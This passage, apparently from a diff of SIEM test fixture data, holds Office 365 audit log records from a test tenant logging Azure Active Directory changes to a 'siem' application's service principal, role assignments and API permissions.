"AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, 
{"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", 
"SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", 
"Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": 
"env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", 
"Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", 
"NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": 
"ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.6473040Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492835"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", 
"Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "76f9b173-c35c-4dbb-b5f7-64750ae994ce"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n 